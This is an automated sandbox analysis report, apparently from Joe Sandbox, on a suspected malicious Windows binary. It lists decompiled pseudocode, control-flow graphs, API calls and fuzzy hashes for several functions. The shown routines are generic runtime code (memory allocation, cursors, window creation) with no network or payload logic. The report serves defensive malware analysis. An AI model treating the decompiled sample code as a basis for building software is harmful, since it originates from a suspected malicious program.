                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Char$FileIconLoadLowerModuleName
                                  • String ID: MAINICON
                                  • API String ID: 3935243913-2283262055
                                  • Opcode ID: 749e5935ece9b9ca536fad64a292b6f04e7e3b732791706d472bf17567022dd7
                                  • Instruction ID: 7762ded3d26ada70a0d4ae2ed5f62854948f82d4012a9fa2ad6908d08bb40e5d
                                  • Opcode Fuzzy Hash: 749e5935ece9b9ca536fad64a292b6f04e7e3b732791706d472bf17567022dd7
                                  • Instruction Fuzzy Hash: C2512070A042449FD750DF39C8C5B867BE4AB15308F4480BAE848DF397D7BE9948CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00448B2C, Relevance: 6.1, APIs: 4, Instructions: 99COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 84%
                                  			E00448B2C(char __edx, void* __edi) {
				char _v5;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr* _t28;
				intOrPtr* _t29;
				intOrPtr _t42;
				intOrPtr* _t45;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t62;
				void* _t63;
				char _t64;
				void* _t74;
				intOrPtr _t75;
				void* _t76;
				void* _t77;

				_t74 = __edi;
				_t64 = __edx;
				if(__edx != 0) {
					_t77 = _t77 + 0xfffffff0;
					_t25 = E004033E4(_t25, _t76);
				}
				_v5 = _t64;
				_t62 = _t25;
				E00418EC4(_t63, 0);
				_t28 =  *0x44ddf4; // 0x44d3b4
				 *((intOrPtr*)(_t28 + 4)) = _t62;
				 *_t28 = 0x448ed0;
				_t29 =  *0x44de00; // 0x44d3bc
				 *((intOrPtr*)(_t29 + 4)) = _t62;
				 *_t29 = 0x448edc;
				E00448EE8(_t62);
				 *((intOrPtr*)(_t62 + 0x3c)) = GetKeyboardLayout(0);
				 *((intOrPtr*)(_t62 + 0x4c)) = E004030A8(1);
				 *((intOrPtr*)(_t62 + 0x50)) = E004030A8(1);
				 *((intOrPtr*)(_t62 + 0x54)) = E004030A8(1);
				 *((intOrPtr*)(_t62 + 0x58)) = E004030A8(1);
				_t42 = E004030A8(1);
				 *((intOrPtr*)(_t62 + 0x7c)) = _t42;
				L004062C0();
				_t75 = _t42;
				L00406058();
				 *((intOrPtr*)(_t62 + 0x40)) = _t42;
				L004064F8();
				_t11 = _t62 + 0x58; // 0x441f286e
				_t45 =  *0x44df40; // 0x44f914
				 *((intOrPtr*)( *_t45))(0, 0, E00445304,  *_t11, 0, _t75, _t75, 0x5a, 0);
				 *((intOrPtr*)(_t62 + 0x84)) = E0041BD2C(1);
				 *((intOrPtr*)(_t62 + 0x88)) = E0041BD2C(1);
				 *((intOrPtr*)(_t62 + 0x80)) = E0041BD2C(1);
				E00449308(_t62, _t62, _t63, _t74);
				_t15 = _t62 + 0x84; // 0x38004010
				_t56 =  *_t15;
				 *((intOrPtr*)(_t56 + 0xc)) = _t62;
				 *((intOrPtr*)(_t56 + 8)) = 0x4491e4;
				_t18 = _t62 + 0x88; // 0x90000000
				_t57 =  *_t18;
				 *((intOrPtr*)(_t57 + 0xc)) = _t62;
				 *((intOrPtr*)(_t57 + 8)) = 0x4491e4;
				_t21 = _t62 + 0x80; // 0x94000000
				_t58 =  *_t21;
				 *((intOrPtr*)(_t58 + 0xc)) = _t62;
				 *((intOrPtr*)(_t58 + 8)) = 0x4491e4;
				_t59 = _t62;
				if(_v5 != 0) {
					E0040343C(_t59);
					_pop( *[fs:0x0]);
				}
				return _t62;
			}























                                  0x00448b2c
                                  0x00448b2c
                                  0x00448b34
                                  0x00448b36
                                  0x00448b39
                                  0x00448b39
                                  0x00448b3e
                                  0x00448b41
                                  0x00448b47
                                  0x00448b4c
                                  0x00448b51
                                  0x00448b54
                                  0x00448b5a
                                  0x00448b5f
                                  0x00448b62
                                  0x00448b6a
                                  0x00448b76
                                  0x00448b85
                                  0x00448b94
                                  0x00448ba3
                                  0x00448bb2
                                  0x00448bbc
                                  0x00448bc1
                                  0x00448bc6
                                  0x00448bcb
                                  0x00448bd0
                                  0x00448bd5
                                  0x00448bdb
                                  0x00448be0
                                  0x00448bee
                                  0x00448bf5
                                  0x00448c03
                                  0x00448c15
                                  0x00448c27
                                  0x00448c2f
                                  0x00448c34
                                  0x00448c34
                                  0x00448c3a
                                  0x00448c3d
                                  0x00448c44
                                  0x00448c44
                                  0x00448c4a
                                  0x00448c4d
                                  0x00448c54
                                  0x00448c54
                                  0x00448c5a
                                  0x00448c5d
                                  0x00448c64
                                  0x00448c6a
                                  0x00448c6c
                                  0x00448c71
                                  0x00448c78
                                  0x00448c81

                                  APIs
                                  • GetKeyboardLayout.USER32(00000000), ref: 00448B71
                                  • 72E7AC50.USER32(00000000,?,?,00000000,?,00437192,00000000,00000000,?,00000000,?,00000000,00437210), ref: 00448BC6
                                  • 72E7AD70.GDI32(00000000,0000005A,00000000,?,?,00000000,?,00437192,00000000,00000000,?,00000000,?,00000000,00437210), ref: 00448BD0
                                  • 72E7B380.USER32(00000000,00000000,00000000,0000005A,00000000,?,?,00000000,?,00437192,00000000,00000000,?,00000000,?,00000000), ref: 00448BDB
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: B380KeyboardLayout
                                  • String ID:
                                  • API String ID: 648844651-0
                                  • Opcode ID: 4833818333ae1f676f6f073883b2276584017d72018302c23ae20f7b6612e1f7
                                  • Instruction ID: 54356bd3370719273cc311dc10c274f3ec371e69c3afe03eb4c47db8766a1265
                                  • Opcode Fuzzy Hash: 4833818333ae1f676f6f073883b2276584017d72018302c23ae20f7b6612e1f7
                                  • Instruction Fuzzy Hash: E431C7706012419FE740EF29D8C5B997BE4AB05318F0481BEE908DF3A6DA7A9848DB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004019FC, Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 365 4019fc-401a1e RtlInitializeCriticalSection 366 401a20-401a25 RtlEnterCriticalSection 365->366 367 401a2a-401a60 call 4013c0 * 3 LocalAlloc 365->367 366->367 374 401a91-401aa5 367->374 375 401a62 367->375 379 401ab1 374->379 380 401aa7-401aac RtlLeaveCriticalSection 374->380 376 401a67-401a79 375->376 376->376 378 401a7b-401a8a 376->378 378->374 380->379
                                  C-Code - Quality: 68%
                                  			E004019FC() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401AB2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x44f5c8);
				L00401350();
				if( *0x44f049 != 0) {
					_push(0x44f5c8);
					L00401358();
				}
				E004013C0(0x44f5e8);
				E004013C0(0x44f5f8);
				E004013C0(0x44f624);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x44f620 = _t11;
				if( *0x44f620 != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x44f620; // 0x70cac0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x44f60c)) = 0x44f608;
					 *0x44f608 = 0x44f608;
					 *0x44f614 = 0x44f608;
					 *0x44f5c0 = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401AB9);
				if( *0x44f049 != 0) {
					_push(0x44f5c8);
					L00401360();
					return 0;
				}
				return 0;
			}








                                  0x00401a01
                                  0x00401a02
                                  0x00401a07
                                  0x00401a0a
                                  0x00401a0d
                                  0x00401a12
                                  0x00401a1e
                                  0x00401a20
                                  0x00401a25
                                  0x00401a25
                                  0x00401a2f
                                  0x00401a39
                                  0x00401a43
                                  0x00401a4f
                                  0x00401a54
                                  0x00401a60
                                  0x00401a62
                                  0x00401a67
                                  0x00401a67
                                  0x00401a6f
                                  0x00401a73
                                  0x00401a74
                                  0x00401a80
                                  0x00401a83
                                  0x00401a85
                                  0x00401a8a
                                  0x00401a8a
                                  0x00401a93
                                  0x00401a96
                                  0x00401a99
                                  0x00401aa5
                                  0x00401aa7
                                  0x00401aac
                                  0x00000000
                                  0x00401aac
                                  0x00401ab1

                                  APIs
                                  • RtlInitializeCriticalSection.KERNEL32(0044F5C8,00000000,00401AB2,?,?,00402296,0044F608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401A12
                                  • RtlEnterCriticalSection.KERNEL32(0044F5C8,0044F5C8,00000000,00401AB2,?,?,00402296,0044F608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401A25
                                  • LocalAlloc.KERNEL32(00000000,00000FF8,0044F5C8,00000000,00401AB2,?,?,00402296,0044F608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401A4F
                                  • RtlLeaveCriticalSection.KERNEL32(0044F5C8,00401AB9,00000000,00401AB2,?,?,00402296,0044F608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401AAC
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                  • String ID:
                                  • API String ID: 730355536-0
                                  • Opcode ID: 356a7c66a2d65856bea98b47bf8316d81f903ccf4c0801b3c83987a954302930
                                  • Instruction ID: 11ff6b854581f6326aade3b65510fb584eff821202e8baf66a9bb65ffce695b5
                                  • Opcode Fuzzy Hash: 356a7c66a2d65856bea98b47bf8316d81f903ccf4c0801b3c83987a954302930
                                  • Instruction Fuzzy Hash: 0B0180747452806EF319BFB99806B193AC0E78A709F56847BF801A6AF3D67C48498B1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00421C20, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 381 421c20-421c2e 382 421c50-421c5b 381->382 383 421c30-421c4e call 421b38 KiUserCallbackDispatcher 381->383 385 421c6f-421c71 382->385 386 421c5d 382->386 391 421c87-421c89 383->391 390 421c7c-421c7f 385->390 388 421c73-421c75 386->388 389 421c5f-421c60 386->389 388->390 392 421c62-421c66 389->392 393 421c77 389->393 390->391 394 421c81-421c82 GetSystemMetrics 390->394 392->390 395 421c68-421c6d 392->395 393->390 394->391 395->390
                                  C-Code - Quality: 58%
                                  			E00421C20(int _a4) {
				void* __ebx;
				void* __ebp;
				signed int _t2;
				signed int _t3;
				void* _t7;
				int _t8;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t8 = _a4;
				if( *0x44f920 == 0) {
					 *0x44f8f8 = E00421B38(0, _t8,  *0x44f8f8, _t17, _t18);
					_t7 =  *0x44f8f8(_t8); // executed
					return _t7;
				}
				_t3 = _t2 | 0xffffffff;
				_t12 = _t8 + 0xffffffb4 - 2;
				__eflags = _t12;
				if(__eflags < 0) {
					_t3 = 0;
				} else {
					if(__eflags == 0) {
						_t8 = 0;
					} else {
						_t13 = _t12 - 1;
						__eflags = _t13;
						if(_t13 == 0) {
							_t8 = 1;
						} else {
							__eflags = _t13 - 0xffffffffffffffff;
							if(_t13 - 0xffffffffffffffff < 0) {
								_t3 = 1;
							}
						}
					}
				}
				__eflags = _t3 - 0xffffffff;
				if(_t3 != 0xffffffff) {
					return _t3;
				} else {
					return GetSystemMetrics(_t8);
				}
			}













                                  0x00421c24
                                  0x00421c2e
                                  0x00421c42
                                  0x00421c48
                                  0x00000000
                                  0x00421c48
                                  0x00421c50
                                  0x00421c58
                                  0x00421c58
                                  0x00421c5b
                                  0x00421c6f
                                  0x00421c5d
                                  0x00421c5d
                                  0x00421c73
                                  0x00421c5f
                                  0x00421c5f
                                  0x00421c5f
                                  0x00421c60
                                  0x00421c77
                                  0x00421c62
                                  0x00421c63
                                  0x00421c66
                                  0x00421c68
                                  0x00421c68
                                  0x00421c66
                                  0x00421c60
                                  0x00421c5d
                                  0x00421c7c
                                  0x00421c7f
                                  0x00421c89
                                  0x00421c81
                                  0x00000000
                                  0x00421c82

                                  APIs
                                  • GetSystemMetrics.USER32 ref: 00421C82
                                    • Part of subcall function 00421B38: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00421BB8
                                  • KiUserCallbackDispatcher.NTDLL ref: 00421C48
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: AddressCallbackDispatcherMetricsProcSystemUser
                                  • String ID: GetSystemMetrics
                                  • API String ID: 54681038-96882338
                                  • Opcode ID: 9aa33d5a10da68003de371c1c4672fa77ddc1e8f7197474334caa3030beb35cf
                                  • Instruction ID: ed555d7674bd9a49a1034d6295892c5b71ffe7927f1f4dc75cfb49117a012f72
                                  • Opcode Fuzzy Hash: 9aa33d5a10da68003de371c1c4672fa77ddc1e8f7197474334caa3030beb35cf
                                  • Instruction Fuzzy Hash: 4BF0627C38431A5ADB105B3ABC8462235499777330FE14B33E122492F1D37C8846525D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004020E8, Relevance: 3.1, APIs: 2, Instructions: 124COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 396 4020e8-4020fa 397 402105-40210b 396->397 398 4020fc call 4019fc 396->398 400 402117-40212c 397->400 401 40210d-402112 397->401 402 402101-402103 398->402 404 402138-402141 400->404 405 40212e-402133 RtlEnterCriticalSection 400->405 403 40226b-402274 401->403 402->397 402->401 406 402143 404->406 407 402148-40214e 404->407 405->404 406->407 408 402154-402158 407->408 409 4021e7-4021ed 407->409 412 40215a 408->412 413 40215d-40216c 408->413 410 402239-40223b call 401ff4 409->410 411 4021ef-4021fc 409->411 421 402240-402257 410->421 414 40220b-402237 call 4038f8 411->414 415 4021fe-402206 411->415 412->413 413->409 416 40216e-40217c 413->416 414->403 415->414 419 402198-40219c 416->419 420 40217e-402182 416->420 426 4021a1-4021bc 419->426 427 40219e 419->427 423 402184 420->423 424 402187-402196 420->424 429 402263 421->429 430 402259-40225e RtlLeaveCriticalSection 421->430 423->424 428 4021be-4021e2 call 4038f8 424->428 426->428 427->426 428->403 430->429
                                  APIs
                                    • Part of subcall function 004019FC: RtlInitializeCriticalSection.KERNEL32(0044F5C8,00000000,00401AB2,?,?,00402296,0044F608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401A12
                                    • Part of subcall function 004019FC: RtlEnterCriticalSection.KERNEL32(0044F5C8,0044F5C8,00000000,00401AB2,?,?,00402296,0044F608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401A25
                                    • Part of subcall function 004019FC: LocalAlloc.KERNEL32(00000000,00000FF8,0044F5C8,00000000,00401AB2,?,?,00402296,0044F608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401A4F
                                    • Part of subcall function 004019FC: RtlLeaveCriticalSection.KERNEL32(0044F5C8,00401AB9,00000000,00401AB2,?,?,00402296,0044F608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401AAC
                                  • RtlEnterCriticalSection.KERNEL32(0044F5C8,00000000,00402264), ref: 00402133
                                  • RtlLeaveCriticalSection.KERNEL32(0044F5C8,0040226B), ref: 0040225E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                  • String ID:
                                  • API String ID: 2227675388-0
                                  • Opcode ID: 64634ed281bf2e3def8dd1485b447f57672411d220fd8f94c72ca7b3ffefdbf2
                                  • Instruction ID: d3f447eb9aa7a160312c851f6e3e80bceeeb0ad4ec12150bafd3bc75c341a2b5
                                  • Opcode Fuzzy Hash: 64634ed281bf2e3def8dd1485b447f57672411d220fd8f94c72ca7b3ffefdbf2
                                  • Instruction Fuzzy Hash: 4241F4B6A04700AFE714DF68ED8525977A0FB46318B1641BFD401E73E1E2789946CB0C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00448EE8, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 433 448ee8-448f02 LoadCursorA 434 448f07-448f0a 433->434 435 448f11-448f14 434->435 436 448f0c-448f0f 434->436 437 448f16-448f1c 435->437 438 448f1e 435->438 436->435 436->437 439 448f20-448f3b LoadCursorA call 448fa0 437->439 438->439 439->434 442 448f3d-448f41 439->442
                                  C-Code - Quality: 100%
                                  			E00448EE8(void* __eax) {
				struct HICON__* _t5;
				void* _t7;
				void* _t8;
				struct HINSTANCE__* _t11;
				CHAR** _t12;
				void* _t13;

				_t13 = __eax;
				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
				_t8 = 0xffffffea;
				_t12 = 0x44dcb0;
				do {
					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
						if(_t8 != 0xffffffeb) {
							_t11 = 0;
						} else {
							goto L4;
						}
					} else {
						L4:
						_t11 =  *0x44f664; // 0x400000
					}
					_t5 = LoadCursorA(_t11,  *_t12); // executed
					_t7 = E00448FA0(_t13, _t5, _t8);
					_t8 = _t8 + 1;
					_t12 =  &(_t12[1]);
				} while (_t8 != 0xffffffff);
				return _t7;
			}









                                  0x00448eec
                                  0x00448efa
                                  0x00448efd
                                  0x00448f02
                                  0x00448f07
                                  0x00448f0a
                                  0x00448f14
                                  0x00448f1e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00448f16
                                  0x00448f16
                                  0x00448f16
                                  0x00448f16
                                  0x00448f24
                                  0x00448f2f
                                  0x00448f34
                                  0x00448f35
                                  0x00448f38
                                  0x00448f41

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CursorLoad
                                  • String ID:
                                  • API String ID: 3238433803-0
                                  • Opcode ID: f2ee8a28f0a3720bb306ca519d2296695a0b1c42c8e1a86dce6c03d1a7a85cb4
                                  • Instruction ID: 41328e01a646b9c4514da70c0aa2717f3160c5ad4e06108785ee4182e3354fb3
                                  • Opcode Fuzzy Hash: f2ee8a28f0a3720bb306ca519d2296695a0b1c42c8e1a86dce6c03d1a7a85cb4
                                  • Instruction Fuzzy Hash: E0F08221B006041AA620663E5CC193E72469BD2735B61033FF93AD72D1CF2A5C49426D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401514, Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 443 401514-401521 444 401523-401528 443->444 445 40152a-401530 443->445 446 401536-40154e VirtualAlloc 444->446 445->446 447 401550-40155e call 4013c8 446->447 448 401573-401576 446->448 447->448 451 401560-401571 VirtualFree 447->451 451->448
                                  C-Code - Quality: 100%
                                  			E00401514(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E004013C8(0x44f5e8, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                                  0x00401517
                                  0x00401521
                                  0x00401530
                                  0x00401523
                                  0x00401523
                                  0x00401523
                                  0x00401536
                                  0x00401543
                                  0x00401548
                                  0x0040154a
                                  0x0040154e
                                  0x00401557
                                  0x0040155e
                                  0x0040156a
                                  0x00401571
                                  0x00000000
                                  0x00401571
                                  0x0040155e
                                  0x00401576

                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,0040181D), ref: 00401543
                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,0040181D), ref: 0040156A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: 8a387463aaac9b488cfbd2126c7c83cbdc0fc5badabbe489550cf97dc277f00b
                                  • Instruction ID: 2b28731dcca4109f5a3d182e153a82ee7636d53d584dc31cef31d6d228a1dc9e
                                  • Opcode Fuzzy Hash: 8a387463aaac9b488cfbd2126c7c83cbdc0fc5badabbe489550cf97dc277f00b
                                  • Instruction Fuzzy Hash: 89F08272F0062027EB605AAA5C81B535A849B857A0F154076FE09FF3E9D6B58C0142AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406728, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 452 406728-40677a call 402908 CreateWindowExA call 4028f8
                                  C-Code - Quality: 100%
                                  			E00406728(CHAR* __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				long _v8;
				void* _t12;
				struct HWND__* _t22;
				long _t27;
				CHAR* _t30;

				_v8 = _t27;
				_t30 = __eax;
				_t12 = E00402908();
				_t22 = CreateWindowExA(0, _t30, __edx, _v8, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E004028F8(_t12);
				return _t22;
			}








                                  0x0040672f
                                  0x00406734
                                  0x00406736
                                  0x00406765
                                  0x0040676e
                                  0x0040677a

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: d6517cc66965a63d9a19f71c26f30e1a56dd765cb672ad3b051190d3b03ed003
                                  • Instruction ID: 67dbcf29178014e7c3850b007cc5250012106697f65b98949b18a9a62ad3702d
                                  • Opcode Fuzzy Hash: d6517cc66965a63d9a19f71c26f30e1a56dd765cb672ad3b051190d3b03ed003
                                  • Instruction Fuzzy Hash: 09F0E7B2700108BFC780DE9DDC85E9B77ECEB4D264B004129FA0CE3241D174EC108760
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004372CC, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 457 4372cc-4372e4 458 4372e6-4372fb GetVersion call 437098 457->458 459 437344-437351 457->459 461 437300-43733f call 412d60 call 412e00 call 412dac * 3 458->461 461->459
                                  C-Code - Quality: 77%
                                  			E004372CC(void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t6;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t17;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t28;

				_t25 = __esi;
				_t17 = __ecx;
				_push(_t28);
				_push(0x437352);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				 *0x44fb18 =  *0x44fb18 - 1;
				if( *0x44fb18 < 0) {
					 *0x44fb14 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
					_t31 =  *0x44fb14;
					E00437098(_t16, __edi,  *0x44fb14);
					_t6 =  *0x427ebc; // 0x427f08
					E00412D60(_t6, _t16, _t17,  *0x44fb14);
					_t8 =  *0x427ebc; // 0x427f08
					E00412E00(_t8, _t16, _t17, _t31);
					_t21 =  *0x427ebc; // 0x427f08
					_t10 =  *0x43866c; // 0x4386b8
					E00412DAC(_t10, _t16, _t21, __esi, _t31);
					_t22 =  *0x427ebc; // 0x427f08
					_t12 =  *0x43735c; // 0x4373a8
					E00412DAC(_t12, _t16, _t22, __esi, _t31);
					_t23 =  *0x427ebc; // 0x427f08
					_t14 =  *0x437480; // 0x4374cc
					E00412DAC(_t14, _t16, _t23, _t25, _t31);
				}
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(0x437359);
				return 0;
			}















                                  0x004372cc
                                  0x004372cc
                                  0x004372d1
                                  0x004372d2
                                  0x004372d7
                                  0x004372da
                                  0x004372dd
                                  0x004372e4
                                  0x004372f4
                                  0x004372f4
                                  0x004372fb
                                  0x00437300
                                  0x00437305
                                  0x0043730a
                                  0x0043730f
                                  0x00437314
                                  0x0043731a
                                  0x0043731f
                                  0x00437324
                                  0x0043732a
                                  0x0043732f
                                  0x00437334
                                  0x0043733a
                                  0x0043733f
                                  0x0043733f
                                  0x00437346
                                  0x00437349
                                  0x0043734c
                                  0x00437351

                                  APIs
                                  • GetVersion.KERNEL32(00000000,00437352), ref: 004372E6
                                    • Part of subcall function 00437098: GetCurrentProcessId.KERNEL32(?,00000000,00437210), ref: 004370B9
                                    • Part of subcall function 00437098: GlobalAddAtomA.KERNEL32 ref: 004370EC
